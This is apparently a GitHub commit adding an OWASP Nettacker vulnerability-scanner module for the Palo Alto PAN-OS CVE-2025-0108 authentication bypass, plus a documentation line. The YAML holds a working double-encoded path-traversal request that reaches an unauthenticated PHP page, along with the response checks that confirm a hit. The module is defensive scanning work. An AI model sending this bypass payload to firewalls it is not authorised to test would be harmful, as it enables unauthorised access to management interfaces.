Skip to content

Commit d76eb0b

Browse files
committed
adding paloalto_panos_cve_2025_0108_vuln module
1 parent 012bf5d commit d76eb0b

File tree

2 files changed

+60
-0
lines changed

2 files changed

+60
-0
lines changed

docs/Modules.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -143,6 +143,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
143143
* '**msexchange_cve_2021_26855**' - check the target for MS Exchange SSRF CVE-2021-26855 (proxylogon/hafnium)
144144
* '**http_cors_vuln**' - check the web server for overly-permissive CORS (header 'Access-Control-Allow-Origin'=*)
145145
* '**options_method_enabled_vuln**' - check if OPTIONS method is enabled on the web server
146+
* '**paloalto_panos_cve_2025_0108_vuln** - check the target for PaloAlto PAN-OS CVE-2025-0108 vulnerability
146147
* '**ProFTPd_bypass_sqli_protection_vuln**' - check ProFTPd for CVE-2009-0543
147148
* '**ProFTPd_cpu_consumption_vuln**' - check ProFTPd for CVE-2008-7265
148149
* '**ProFTPd_directory_traversal_vuln**' - check ProFTPd for CVE-2010-3867
Lines changed: 59 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,59 @@
1+
info:
2+
name: paloalto_panos_cve_2025_0108_vuln
3+
author: OWASP Nettacker team
4+
severity: 8.8
5+
description: CVE-2025-0108 is an authentication bypass in the Palo Alto Networks PAN-OS software, which enables an unauthenticated attacker with network access to the management web interface to bypass the authentication
6+
reference:
7+
- https://security.paloaltonetworks.com/CVE-2025-0108
8+
- https://www.assetnote.io/resources/research/nginx-apache-path-confusion-to-auth-bypass-in-pan-os
9+
- https://www.bleepingcomputer.com/news/security/hackers-exploit-authentication-bypass-in-palo-alto-networks-pan-os/
10+
profiles:
11+
- vuln
12+
- vulnerability
13+
- http
14+
- high_severity
15+
- cve
16+
- paloalto
17+
- paloalto_panos
18+
- panos
19+
20+
21+
payloads:
22+
- library: http
23+
steps:
24+
- method: get
25+
timeout: 3
26+
headers:
27+
User-Agent: "{user_agent}"
28+
allow_redirects: false
29+
ssl: false
30+
url:
31+
nettacker_fuzzer:
32+
input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
33+
prefix: ""
34+
suffix: ""
35+
interceptors:
36+
data:
37+
paths:
38+
- "unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"
39+
schema:
40+
- "http"
41+
- "https"
42+
ports:
43+
- 80
44+
- 443
45+
- 4443
46+
- 8443
47+
response:
48+
condition_type: and
49+
conditions:
50+
status_code:
51+
regex: "200"
52+
reverse: false
53+
header:
54+
Content-Type:
55+
regex: text/html
56+
reverse: false
57+
content:
58+
regex: "Zero Touch Provisioning"
59+
reverse: false

0 commit comments

Comments
 (0)